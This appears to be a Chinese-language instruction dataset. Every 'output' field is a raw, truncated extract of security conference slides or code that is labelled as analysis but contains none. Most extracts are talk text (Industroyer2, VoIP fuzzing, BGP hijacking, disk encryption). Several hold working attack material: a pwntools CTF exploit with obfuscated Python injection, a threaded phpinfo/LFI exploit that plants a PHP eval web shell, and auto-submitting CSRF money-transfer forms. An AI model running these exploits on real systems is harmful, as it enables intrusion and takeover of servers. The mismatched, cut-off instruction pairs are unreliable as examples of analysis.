{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Industroyer2 Sandworm's Cyberwarfare Targets Ukraine's Power Grid Again Anton Cherepanov Robert Lipovsky 1. Sandworm (2014-2022) 2. Industroyer (2016) 3. Industroyer2 (2022)  Attack events  Technical analysis 4. Co-deployed malware 5. Defense 6. Wrap up Anton Cherepanov Senior Malware Researcher Robert Lipovsky Principal Threat Intelligence Researcher @cherepanov74 @Robert_Lipovsky Sandworm 2014-2022 Sandworm Telebots /Voodoo Bear Sednit Fancy Bear/APT28 The Dukes Cozy Bear/APT29 InvisiMole Gamaredon Buhtrap Turla Energetic Bear Sources: Sandworm Telebots /Voodoo Bear GRU Sources: Militaire Inlichtingen en Veiligheidsdienst https://95.143.193.182/Franceaviatelecom8/statmach/aorta.php https://5.61.38.31/epsiloneridani0/setattr.php https://144.76.119.48/arrakis02/loadvers/paramctrl.php https://78.46.40.239/SalusaSecundus2/segments/statinfo.php https://95.143.193.131/houseatreides94/dirconf/check.php https://46.165.222.6/BasharoftheSardaukars/tempreports/vercontrol.php SANDWORM .143.193.182/Franceaviatelecom8/statmach/aorta.php 61.38.31/epsiloneridani0/setattr.php 4.76.119.48/arrakis02/loadvers/paramctrl.php .46.40.239/SalusaSecundus2/segments/statinfo.php .143.193.131/houseatreides94/dirconf/check.php .165.222.6/BasharoftheSardaukars/tempreports/vercontrol.php 24 Feb 2022 Russian invasion of Ukraine Increase in cyberattacks against Ukraine Feb 2014 Russian occupation of Crimea April 2014 War in Donbas begins 24 Feb 2022 Russian invasion of Ukraine Increase in cyberattacks against Ukraine Feb 2014 Russian occupation of Crimea April 2014 War in Donbas begins Nov 2013 BlackEnergy attacks intensify 24 Feb 2022 Russian invasion of Ukraine Feb 2014 Russian occupation of Crimea April 2014 War in Donbas begins Nov 2013 BlackEnergy attacks intensify 24 Feb 2022 Russian invasion of Ukraine Feb 2014 Russian occupation of Crimea April 2014 War in Donbas begins Nov 2013 BlackEnergy attacks intensify Dec 2015 BlackEnergy attack causes blackout in Ukraine 23 D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 0x01 cd /Users/miku/Documents/hack/attack-tools/burpsuite/Burp2020.91 xxx/xxx/xx/jdk14/bin/java -jar Loader.jar export JAVA_HOME=xxxx/xxx/xxx/jdk14 export PATH=xxxx/xxx/xxxx/bin:$PATH cd /Users/miku/Documents/hack/attack-tools/burpsuite/Burp2020.91 xxx/xxx/xx/jdk14/bin/java -jar Loader.jar /Library/Java/JavaVirtualMachines/ 0x02 0x03 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFinding VoIP vulnerabilities while you sleep Background info on VoIP and previous research Introduction to VoIPER Description of some of its features Some demos and usage examples The results of my testing Q&A From Ireland Just finished a Bsc in Computer Systems About to start a Msc in Computer Science Interested in pretty much anything to do with hacking, security and computers in general http://www.unprotectedhex.com Using the IP network to route voice data Can be used exclusively of the traditional phone network or in tandem Variety of devices typically involved Many familiar companies from networking and telecoms Cisco Nortel Avaya Seeing steady adoption across the board ~50% of large businesses are using it in some form in 2008 Why so popular? Reduced costs  Average of 20% reduction Location independence Independence from telcos SIP H.323 H.225 H.239 H.245 RTCP SDP MGCP IAX2 Skype H.460 H.450 RTP STUN RSVP SS7 .and so on Sponsored by the IETF Open standard  RFC 3261 Similar in format to HTTP One of the most popular protocols for consumer devices Used for command and control e.g. session initiation and teardown Other protocols handle data transfer e.g. RTP Carried as the content in certain SIP requests Negotiates the codecs to use for the session Audio Video Extended to cover Fax over IP (T.38) Human readable Combined with SIP, forms an incredibly flexible protocol set INVITE sip:201@192.168.3.102 SIP/2.0 CSeq: 536870905 INVITE Via: SIP/2.0/UDP 192.168.3.104:6060;branch=z9hG4bKmj1079uq From: \"VoIPER\" <sip:201@192.168.3.104:>;tag=hkuybniovshg Call-ID: jqzedy9kvtrmaw1@TheKlatchianHead To: \"201\" <sip:201@192.168.3.102> Content-Type: application/sdp Content-Length: 378 v=0 o=- 1190505265 1190505265 IN IP4 192.168.3.104 s=Pwning your SIP c=IN IP4 192.168.3.104 m=audio 5028 RTP/AVP 101 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-15 ITU sponsored Dominant in the backbone of voice networks and large enterprise deployments A system specification describing the use of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <bits/stdc++.h> using namespace std; struct RNG { random_device dev; mt19937_64 rng; RNG() : dev(), rng(dev()) {} RNG(uint64_t seed) : rng(seed) {} bool next_bit() { return rng() & 1; } // For when we want to hide the RNG state uint64_t next_qword_safe() { uint64_t res = 0; for (int i = 0; i < 64; ++i) res |= next_bit() << i; return res; } // For when we don't care about security uint64_t next_qword_fast() { return rng(); } }; using Vector = valarray<uint64_t>; struct Matrix { vector<Vector> elements; Matrix(int rows, int cols) : elements(rows, Vector(cols)) {} auto rows() const { return elements.size(); } auto cols() const { return elements[0].size(); } auto operator*(const Vector& v) const { assert(v.size() == cols()); Vector res(rows()); for (size_t i = 0; i < rows(); ++i) { Vector mul = elements[i] * v; res[i] = accumulate(begin(mul), end(mul), uint64_t{0}); } return res; } void fill(RNG* rng) { for (auto& row : elements) for (auto& x : row) x = rng->next_qword_fast(); } void fill(uint64_t* data) { int i = 0; for (auto& row : elements) for (auto& x : row) x = data[i++]; } void print() { for (auto& row : elements) for (auto& x : row) cout<<x<<\" \"; } }; constexpr int key_size = 64; void write64(ofstream& o, uint64_t x) { o.write(reinterpret_cast<const char*>(&x), sizeof x); } Vector load_result(string path){ ifstream in(path.c_str(), ios::binary); char buffer[8]; in.read(buffer, 8); uint64_t size = *reinterpret_cast<uint64_t*>(buffer); Vector all(64); for(int i=0;i<64;i++){ in.read(buffer, 8); uint64_t element = *reinterpret_cast<uint64_t*>(buffer); all[i] = element; } Vector res(size); for(int i=0;i<size;i++){ res[i] = all[i+4]; } return res; } int main(int argc, const char **argv) { if(argc < 4){ cerr<<\"./binary start end encrypted_file\"<<endl; exit(-1); } unsigned int start = atoi(argv[1]); unsigned int end = atoi(argv[2]); Vector result = load_result(string(argv[3])); Matrix A_inv(37, 37); uint64_t data[] = {6612423972294138831,9667107047553394101,779", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmdm 0x00 mod_mdm.somdmd 0x01 unix unixwireshark 1. 90header 2. xmlpostbodybody bodyheader0 header 1. 140 2. 581b 02 00 00 3. 91203 00 00 00 58int4 1b 02 00 00 0x21b10539 0x02 1. a33 2. char s[128]s128 3. v6postv6[0]postbody s128 int648qword4 word8byteunsigned int4 mobileidtype 0x03 ipad mobileidtype body0 1. 8d141body0header140141 2. 02 3. mobileid64636400 4. 8type700 5. 0056headerbody 0x04 mdmd mod_mdm.sounixmdmd datadata mod_mdm.sodata 1. v926int26*4=104520 2. v5msgtypetype2v7msgtype 3. v9[11]44v5+1v54mobileid v9 v9[0]=1 4 v9[1]=size=+40 4 v9[2]=v7=msgtype 4 v9[3]=32IP 32 v9[11]=mobileid 8 52 a1v9v1getperformerv1v9[0]1 TaskWorkerDispatchv9[0] DoClientRequest1DoUtilRequest2 data[10] 0x05 data 1. msgytypetype2 2. 3. clipstrncpydata3232clip 4. 40 data[8]data[9]data[10] mod_mdm.so 40 0x06 rce", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The state of web application security 2012 Robert Rowley Security Architect DreamHost Robert.Rowley@DreamHost.com 1 Break Down Attack Trends Attacker Motivation Auditing Backdoors 2 Trends 3 Collecting data Web Application Firewall (mod_security) Running on 1,000,000+ websites Centralized logging 4 Trend data sets 26 Million records. Time frame: August 2011  Present 5 Attacks! 6 Breaking it down 7 Specific attacks against software CVE-2009-2254  E107  Remote code execution  ?var=[php]exec();  Released May 2010 (CVE-2010-2099)  ZenCart  SQL injection/execution  Released May 2009 (CVE-2009-2254) 8 E107 ZenCart 9 timthumb  Allows arbitrary file upload  Including fully functional php files  Popular wordpress theme component  (not part of wordpress core, or plugins)  Released August 2011 (CVE-2011-4106) 10 E107 ZenCart 11 timthumb 12 Puberty Maturity Life-cycle of an exploit 13 Theory about this trend... Attacks are automated.  Lead time for attack code update. Successful compromise adds a new node.  This creates fluctuations in growth. 14 PHP-CGI remote code execution  Arbitrary code execution  Source code disclosure  Denial of service  Released May 2012 (CVE-2012-1823)  Our staff was notified  We rolled out a virtual patch before the 0day was released. 15 E107 ZenCart timthumb 16 0-D ay PHP-CGI 17 PHP-CGI Puberty 18 Attack Response Notify the ISP's abuse desk 90 ISPs notified each day Most are non-responsive to the report. 19 Attack sources  Home/Business ISP (20%)  Hosting/Datacenter (80%) 20 A little about incident response 21 Response breakdown Immediate mitigation Put out the fire Monitor Review Long term fixes Correct business policy Secure code and/or configurations Etc... 22 Standard approach Monitoring Vulnerability released, Incident Assessment, Incident Response Evaluation, Update 23 Better approach Monitoring Vulnerability released, Incident Assessment, Incident Response Evaluation, Update 24 Auditing nitty gritty File monitoring (you do this right?) Logs ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBitcoin Security 陳君明 Jimmy Chen 林志宏 Chris Lin jmchen@chroot.org meconin@gmail.com August 19, 2014 InfoKeyVault Technology Agenda  Introduction to Bitcoin  Security of Bitcoin  Hardware Wallet 2 Agenda  Introduction to Bitcoin - Expanding Economy - Birth of Bitcoin - Cryptographic Primitives - Bitcoin Protocol  Security of Bitcoin  Hardware Wallet 3 4 http://www.cnbc.com/id/100971898 exactly one year ago 5 http://www.businessinsider.com/the-uk-treasury-wants-to-turn-london-into-a-bitcoin-capital-2014-8 http://www.dell.com/learn/us/en/uscorp1/campaigns/bitcoin-marketing 6 http://online.wsj.com/articles/ebay-payment-unit-in-talks-to-accept-bitcoin-1408052917 7 Venture Capital Investment http://www.coindesk.com/state-of-bitcoin-q2-2014-report-expanding-bitcoin-economy http://www.coindesk.com/bitcoin-venture-capital VC Investment up to December 2013: US$ 110 millions VC Investment from January to June 2014: US$ 130 millions 8 2014 VC Investment in Bitcoin Overtakes VC Early-Stage Internet Investments http://www.coindesk.com/state-of-bitcoin-q2-2014-report-expanding-bitcoin-economy 9 Startup Ecosystem: 6 Classifications http://www.coindesk.com/state-of-bitcoin-q2-2014-report-expanding-bitcoin-economy 10 Investor View on Bitcoin http://www.coindesk.com/state-of-bitcoin-q2-2014-report-expanding-bitcoin-economy 11 Date Conference/Event Location Sep 11-12 APEX Digital Currency Partnerships San Francisco, California, US Sep 11-12 Bitcoin Central & Eastern European Conference Ljubljana, Slovenia Sep 15-16 Inside Bitcoins London London, England Sep 17-18 Crypto Valley Summit Isle of Man, British Isles Sep 17-19 Digital Currency Summit Andorra la Vella, Andorra Sep 19-20 Bitcoin Expo China 2014 Shanghai, China Sep 26 Bitcoin Conference Kiev 2014 Kiev, Ukraine Sep 28-29 Seattle Bitcoin Summit Seattle, US Oct 10-11 Hashers United Las Vegas, US Oct 16-17 Bitcoin to Business Congress Brussels, Belgium Nov 2-6 Bitcoin World at Money2020 Las Vegas, US Nov 18-19 Payments Indonesia Jakar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBiting the Hand that Feeds You Storing and Serving Malicious Content from Popular Web Servers Billy K Rios (BK) and Nate McFeters Agenda Domain Names and Trust  Who do you Trust?  Biting the Hand - Yahoo  Biting the Hand - Gmail  Flash Based Attacks  URI Use and Abuse  Questions / Conclusions Who do you Trust? Domain Names and Trust  Browser Restrictions  SSL Certificates  Phishing Filters  Human Trust Cross Site Request Forgery Classic Example of CSRF  The attacker (Billy) decides to transfer $1 to his friends (Nate) checking account using www.BigCreditUnion.com. GET /transfer.do?toacct=NATE&amount=1 HTTP/1.1     Cookie: MYCOOKIE=AWSWADJ1LE3UQHJ3AJUAJ5Q5U Host: www.BigCreditUnion.com Cross Site Request Forgery CSRF Classic Example  The web application does a great job of tying the users session to the appropriate account and subtracts the $1 from Billys account and adds $1 to Nates account. <img src= \"http://BigCreditUnion.com /transfer.do?toacct=BILLY&amount=10000\" width=\"1\" height=\"1\" border=\"0\"> Cross Site Request Forgery Classic CSRF with a Twist  Forcing the users browser to establish an authenticated session with the target server. Nasty JavaScript CODE Cross Site Request Forgery Classic CSRF with a Twist DEMO Web Mail Web Mail Features  Storage Space  Anonymity  Speed  Trust Biting the Hand That Feeds You Yahoo  Yahoo Sign up Process  Yahoo Protection Measures  Storing Content on Yahoo  Serving Content on Yahoo Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Yahoo DEMO Biting the Hand That Feeds You Gmail  Gmail Sign up Process  Gmail Protection Measures  Storing Content on Gmail  Serving Content on Gmail Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Biting the Hand That Feeds You Gmai", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaelstrom: Are you playing with a full deck? Using an Attack Life Cycle Game to Educate, Demonstrate and Evangelize DEF CON 24 #cybermaelstrom Shane Steiger, Esq. CISSP  2016 $ whoami ~messing with computers since 1989 - TIN, PINE, yTalk, Lynx, MUDs, etc. ~8 years in a large food manufacturer helping to build and secure SCADA/ICS systems across 90+ food manufacturing plants in the US. ~6 years building out a security function in one of the largest pharmaceutical drug distributors in the US. ~currently Chief Endpoint Security Architect in a large tech company building out the roadmaps for desirable Cyber Resiliency techniques in the endpoint space. ~much better than family law! I am more of a geek. $ disclaimer ~the views and opinions are purely my own based on time in the industry and experience. They dont necessarily reflect the views, positions or policies of my employer. ~oh yeah....this presentation and discussion is not intended to give legal advice nor form any kind of attorney/client relationship. I am not your attorney and some of the things you might find interesting may require consultation with your own attorney (not me ). $ agenda ~journey picking strategies - who wins? ~attack life cycle primer ~why study attack lifecycles? ~what do effective defensive strategies look like? ~exercises in building out your defensive strategies ~...maybe there is something more here... $ strategy journey ~from a past life, I was asked by a CIO do they win? ~later, asked to look at a solution for over 300k endpoints ~like most folks  look at requirements, functions, capabilities and operationalization ~hmmmm....wow I got a pretty heat map that doesnt seem very useful in terms of selecting things at large scale ~do they win stuck with me to develop better strategic choices $ Lockheed Martin Kill Chain Phases  Reconnaissance  Research, ID/selection of targets  Email addresses  Social relationships  Target technology & topology Weaponization  Combining an exploit with a paylo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefense&by&Numb3r5& & Making'problems'for'script'k1dd13s' and'scanner'monkeys! @ChrisJohnRiley' THE'WISEST'MAN,'IS'HE' WHO'KNOWS,'THAT'HE' KNOWS'NOTHING' ' ' SOCRATES:'APOLOGY,'21D' This&talk&contains:! !- Numbers - Bad Jokes - Traces of peanuts - Did I mention numbers? !! TL!;DR! Goals!for!this!talk! Describe!the! defensive!uses!of! HTTP!status!codes! 1) What& 2) Why& 3) How& 4) Goals& 5) Bringing&it&together& 6) Review& #1& ]! [!WHAT ? HTTP!STATUS!CODES! Seems!like!such!a!! Small!detail! !small!detail,! big!impact! HTTP!Status!Codes! ! Majority!part!of!RFC!2616!(HTTP/1.1)! ! 5!main!classes!of!response! ! 1XX!informaOonal' ! 2XX!success! ! 3XX!redirecOon! ! 4XX!client'error! ! 5XX!server'error! HTTP!Status!Codes! ! Proposed!RFC*!for!7XX!codes! ! Examples:! ! 701!Meh' ! 719!I'am'not'a'teapot! ! 721!Known'unknowns! ! 722!Unknown'unknowns! ! 732!Fucking'Unicde' *!h]ps://github.com/joho/7XX_rfc! BASICS! AKA:!THE!BORING!THEORY!BIT! #1.1& 1XX!Informaeonal! ! Indicates!response!received! ! Processing!is!not!yet!completed! ! 100!Conenue! ! 101!Switching!Protocols! ! 102!Processing!(WebDAV!RFC!2518)! 2XX!Success! ! Indicates!response!received! ! Processed!and!understood! ! 200!OK! ! 201!Created! ! 202!Accepted! ! 203!Non_Authoritaeve!Informaeon! ! 204!No!Content! 2XX!Success!(cont.)! ! 205!Reset!Content! ! 206!Pareal!Content! ! 207!Mule_Status!(WebDAV!RFC!4918)! Codes!not!supported!by!Apache! ! 208!Already!Reported! ! 226!IM!Used! ! 250!Low!on!Storage!Space! 3XX!Redireceon! ! Aceon!required!to!complete!request! ! 300!Muleple!Choices! ! 301!Moved!Permanently! ! 302!Found!(Moved!Temporarily)! ! 303!See!Other! ! 304!Not!Modified! 3XX!Redireceon!(cont.)! ! 305!Use!Proxy! ! 306!Switch!Proxy!(unused)! ! 307!Temporary!Redirect! Codes!not!supported!by!Apache! ! 308!Permanent!Redirect! 4XX!Client!Error! ! Client!caused!an!error! ! 400!Bad!Request! ! 401!Unauthorized! ! 402!Payment!Required! ! 403!Forbidden! ! 404!Not!Found! ! 405!Method!Not!Allowed! 4XX!Client!Error!(cont.)! ! 406!No", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Future of Cybertravel: Legal Implications of the Evasion of Geolocation Marketa Trimble Marketa Trimble What is this talk about?  What the law has (or does not have) to say about evasion of geolocation or cybertravel  about acts by which a user makes geolocation tools believe that he is physically located somewhere other than where he is located.  Example: I sit in the U.S. but use MyExpatNetwork.co.uk to acquire a U.K. IP address and appear as though I am connected to the internet from the U.K.  Is this legal? Does the law care? Will the law care in the future? Marketa Trimble Disclaimer  This talk does not cover all the various ways in which geolocation may be evaded.  Nothing said in this presentation, during the Q&A, or included in these slides is legal advice.  Nothing in this presentation should be construed as advertising or recommending particular tools or services, or advising or advocating any particular conduct. Marketa Trimble Why will this talk be of benefit to you?  Learn (or update your knowledge) about what the law says about geolocation and the evasion of geolocation.  Begin thinking about any risks you may consider or subject yourself to when you evade geolocation or provide tools to evade geolocation (= think about what questions you might want to ask your lawyer).  Become aware of policy issues that might concern you if you care about the future of the internet. Marketa Trimble What will this talk cover? 1. Definitions 2. Territoriality of the law and the internet 3. Geolocation tools 3.1 Current uses 3.2 Current law 4. Evasion of geolocation 5. Law and the evasion of geolocation 5.1 Current law 5.1.1 Liability of an end user 5.1.2 Liability of an evasion tool provider 5.2 Future law Marketa Trimble 1. Definitions  Geolocation  Evasion of geolocation = cybertravel  Cybertravel versus GoToMyPC, LogMeIn  Cybertravel versus place shifting services  ManekiTV (Japan)  TVCatchUP (U.K.)  ivi (U.S.), Justin.tv (U.S.)  Cybertravel versus anonymization", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStealing The Internet An Internet-Scale Man In The Middle Attack Defcon 16, Las Vegas, NV - August 10th, 2008 Alex Pilosov  Pure Science Chairman of IP Hijacking BOF ex-moderator of NANOG mailing list alex@pilosoft.com Tony Kapela  Public Speaking Skills CIO of IP Hijacking BOF tk@5ninesdata.com Why Should You Care?  Because your inbound traffic can be passively intercepted  Because your outbound traffic to specific destinations can also be intercepted  Because your data can be stored, dropped, filtered, mutilated, spindled, or modified  Because this cannot be solved without provider cooperation  Because its unlikely to be noticed, unless youre looking for it Agenda  BGP & Internet 101  Old Hijackings  The main monkey business  MITM method, explained  Graphs, etc  Live Demo BGP 101 How is the Internet glued together?  No central core  Individual networks (identified by ASN) interconnect and announce IP space to each other  Announcement contains IP prefix, AS-PATH, communities, other attributes  AS-PATH is a list of who has passed the announcement along; used to avoid loops (important for our method)  Fundamental tenet in IP routing: More-specific prefixes will win  e.g. 10.0.0.0/24 wins over 10.0.0.0/8 ..if we had to whiteboard it graphic courtesy jungar.net Network Relationship Norms  Peer: No money changes hands, routes are not redistributed to transits and other peers  1:1 relationship  Customer: Pays transit provider to accept their announcement, sends routes to peers and transits On Prefixes  Internet routing is inherently trust-based  No chain of trust in IP assignments  ICANN assigns space to Regional Internet Registries (RIRs - ARIN/RIPE/AFRINIC)  RIRs assign to ISPs or LIRs (in RIPE region)  No association between ASN and IP for most assignments (except RIPE) State The problem Various levels of sophistication in Route/Prefix Filtering  Customer:  Often unfiltered BGP: max-prefix and sometimes AS- PATH  Smaller carriers and smaller customers  static prefix-l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom pwn import * context.log_level=\"DEBUG\" r=remote(\"accounts.pwn2win.party\",3760) r.sendline(\"Fideleeto1926zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz|ZZZZZZZZZZZZZZz\") while True: l=r.recvline() if l.find(\"Exit\")>-1: break r.sendline(\"110\") r.sendline(\"__import__(chr(115)+chr(121)+chr(115)).stdout.write(open(chr(105)+chr(110)+chr(102)+chr(111)+chr(115)).read())\") while True: print r.recvline() r.interactive()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH smbsh 1 Samba \"23 Oct 1998\" .SH NAME .B smbsh - 允许用UNIX命令访问NT文件系统 .SH 总览 .B smbsh .SH 描述 此程序是\\fBSamba\\fR套件的一部分 \\fBsmbsh\\fR允许你用UNIX命令诸如\\fBls\\fR\\fBegrep\\fR和\\fBrcp\\fR等来访问NT文件系统必须用动态链接的shell以便使\\fBsmbsh\\fR工作正常 从命令提示上执行\\fBsmbsh\\fR命令并输入用户账号和口令以便在NT操作系统中验证你的身份 .nf system% smbsh Username: user Password: .fi 从shell上执行任何动态链接的命令都会用smb协议来访问/smb目录例如命令 .nf ls /smb .fi 会显示你工作组里的所有主机而命令 .nf ls /smb/<machine-name> .fi 会显示指定主机上的共享名当然也可以用\\fBcd\\fR命令来改变目录\\fBvi\\fR来编辑文件\\fBrcp\\fR来拷贝文件 .SH 版本 此手册页是针对samba套件版本2.0的 .SH 错误 \\fBsmbsh\\fR通过动态装入的\\fIsmbwrapper.o\\fR截获标准libc调用来工作但并不是所有的调用都可以被截获所以有些程序可能在smbsh下工作得不太正常 非动态链接的程序并不能使用\\fBsmbsh\\fR的功能很多版本的UNIX有一个\\fBfile\\fR命令会描述程序如何被链接 .SH 另见 SEE ALSO .PP \\fBsmb.conf\\fR (5), \\fBsmbd\\fR (8). .SH \"作者 AUTHOR\" .PP samba软件和相关工具最初由Andrew Tridgell创建samba现在由Samba Team 作为开源软件来发展类似linux内核的开发方式 .PP 最初的samba手册页是 Karl Auer写的 手册页源码已经转换为YODL格式(另一种很好的开源软件可以在ftp://ftp.ice.rug.nl/pub/unix找到)由Jeremy Sllison 更新到Samba2.0 版本 Gerald Carter 在Samba2.2中将它转化为DocBook 格式 Alexander Bokovoy 在Samba 3.0中实现了DocBook XML4.2 格式的转换 .SH \"[中文版维护人]\" .B meaculpa <meaculpa@21cn.com> .SH \"[中文版最新更新]\" .B 2000/12/08 .SH \"中国linux论坛man手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n看见有人再发 nc 的反序列化这玩意不是一堆么下面就是特别简单的一个刚入门的小白应该都能看出来 因为 web.xml 下的 servelt/* 所对应的类是 nc.bs.framework.server.InvokerServlet 其大概意思是根据/*后面的服务名查找对应类 根据文档有一处 UploadServlet对应类:nc.document.pub.fileSystem.servlet.UploadServlet 然后直接找这个类看了 doget 和 dopost 都指向 doaction 方法随便看一下就 知道了 开发是老实人这里啥都没有直接把 InputStream 拿去反序列化多简单 攻击链 cc6. 这种类型的还有好多照着这个思路审计下去你至少还能在发现 4 处", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWIPING OUT CSRF JOE ROZNER | @JROZNER ITS 2017 WHAT IS CSRF? WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS 4 WHERE DOES CSRF COME FROM? LETS TALK HTTP SAFE VS. UNSAFE  Safe  GET  HEAD  OPTIONS  Unsafe  PUT  POST  DELETE 8 SAFE VS. UNSAFE LETS TALK COOKIES COOKIES  Cookies typically used to specify session identifier for server  Users depend on user agents to correctly control access to cookies  User agents only but always send cookies with matching domain to hosts  This is done regardless of matching origin  Cookies are user agent global (work cross tab) 10 SESSION=298zf09hf012fh2; Domain=example.com; Secure; HttpOnly LETS TALK XSS XSS  Attackers use XSS to inject CSRF payloads into the DOM  With sufficient XSS all counter measures can be bypassed 13 HOW DOES CSRF WORK? FORM BASED  Normal HTML form that a victim is forced to submit  Either genuinely supplied or attacker supplied (via XSS)  Typically performed with JavaScript via XSS or attacker controlled page  Good option for bypassing same origin without CORS  Good option where safe verbs are used correctly  Useful for phishing links as long as form click is fast 15 <html> <head> </head> <body> <form action=\"http://bank.lol/transfer\" method=\"POST\"> <input type=\"hidden\" name=\"account\" value=\"12345\" /> <input type=\"hidden\" name=\"amount\" value=\"100000000\" /> <input type=\"submit\">Submit</input> </form> </body> <script>document.querySelector('form').submit();</script> </html> XHR  Typically comes from an XSS payload  Limited to the origin unless CORS is enabled  No page reload required  More difficult for victim to detect 17 <script> var xhr = new XMLHttpRequest(); xhr.open('POST', '/transfer', true); xhr.onreadystatechange=function() { if (xhr.readyState === 4) { // request made } }; xhr.send('account=12345&amount=1000000'); </script> RESOURCE INCLUSION  Doesnt depend on XSS or attacker supplied pages  Requires an attacker to have control over resources on the page  Depends on using ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Password is Not Enough Why disk encryption is broken and how we might fix it Daniel Selifonov DEF CON 21 2013-08-02 Five Questions  Do you encrypt the drive in your computer?  Using something like TrueCrypt, dmcrypt, loop-aes?  Do you always cold shutdown when leaving your computer unattended?  Have you ever left your computer unattended for more than a few hours?  How about more than a few minutes? Why do we encrypt?  Confidentiality and Integrity  Secrecy, privacy, and the power to determine what happens to personal and business data  Legal liability  Access control in the face of physical access  Trustworthiness of our endpoints Armor, Sieves, and Rubber Hoses  Cryptography is not the weakest link  Random number generation  Block cipher modes of operation  Key derivation from passwords  Many open source implementations  The side channels:  Attack the apparatus  Attack the user http://en.wikipedia.org/wiki/File:Bush_mission_accomplished.jpg Mismatched Objectives  Disk encryption threat models versus de facto use:  [TrueCrypt does not] secure any data on a computer if an attacker has physical access to the computer before or while TrueCrypt is running on it. http://www.truecrypt.org/docs/security-model From the Horse's Mouth  TrueCrypt: We generally disregard \"janitor\" attacks since they inherently make the machine untrusted. We never consider the feasibility of hardware attacks; we simply have to assume the worst. After an attacker has \"worked\" with your hardware, you have to stop using it for sensitive data. It is impossible for TPM to prevent hardware attacks (for example, using hardware key loggers, which are readily available to average Joe users in computer shops, etc.)  Joanna Rutkowska: And how can you determine that the attacker have or have not \"worked\" with your hardware? Do you carry your laptop with you all the time?  TC: Given the scope of our product, how the user ensures physical security is not our problem. Anyway, to answer your question (as a s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python import sys import threading import socket def setup(host, port): TAG=\"Security Test\" PAYLOAD=\"\"\"%s\\r <?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\\r\"\"\" % TAG REQ1_DATA=\"\"\"-----------------------------7dbff1ded0714\\r Content-Disposition: form-data; name=\"dummyname\"; filename=\"test.txt\"\\r Content-Type: text/plain\\r \\r %s -----------------------------7dbff1ded0714--\\r\"\"\" % PAYLOAD padding=\"A\" * 5000 REQ1=\"\"\"POST /phpinfo.php?a=\"\"\"+padding+\"\"\" HTTP/1.1\\r Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=\"\"\"+padding+\"\"\"\\r HTTP_ACCEPT: \"\"\" + padding + \"\"\"\\r HTTP_USER_AGENT: \"\"\"+padding+\"\"\"\\r HTTP_ACCEPT_LANGUAGE: \"\"\"+padding+\"\"\"\\r HTTP_PRAGMA: \"\"\"+padding+\"\"\"\\r Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\\r Content-Length: %s\\r Host: %s\\r \\r %s\"\"\" %(len(REQ1_DATA),host,REQ1_DATA) #modify this to suit the LFI script LFIREQ=\"\"\"GET /lfi.php?file=%s HTTP/1.1\\r User-Agent: Mozilla/4.0\\r Proxy-Connection: Keep-Alive\\r Host: %s\\r \\r \\r \"\"\" return (REQ1, TAG, LFIREQ) def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s2.connect((host, port)) s.send(phpinforeq) d = \"\" while len(d) < offset: d += s.recv(offset) try: i = d.index(\"[tmp_name] =&gt; \") fn = d[i+17:i+31] except ValueError: return None s2.send(lfireq % (fn, host)) d = s2.recv(4096) s.close() s2.close() if d.find(tag) != -1: return fn counter=0 class ThreadWorker(threading.Thread): def __init__(self, e, l, m, *args): threading.Thread.__init__(self) self.event = e self.lock = l self.maxattempts = m self.args = args def run(self): global counter while not self.event.is_set(): with self.lock: if counter >= self.maxattempts: return counter+=1 try: x = phpInfoLFI(*self.args) if self.event.is_set(): break if x: print \"\\nGot it! Shell created in 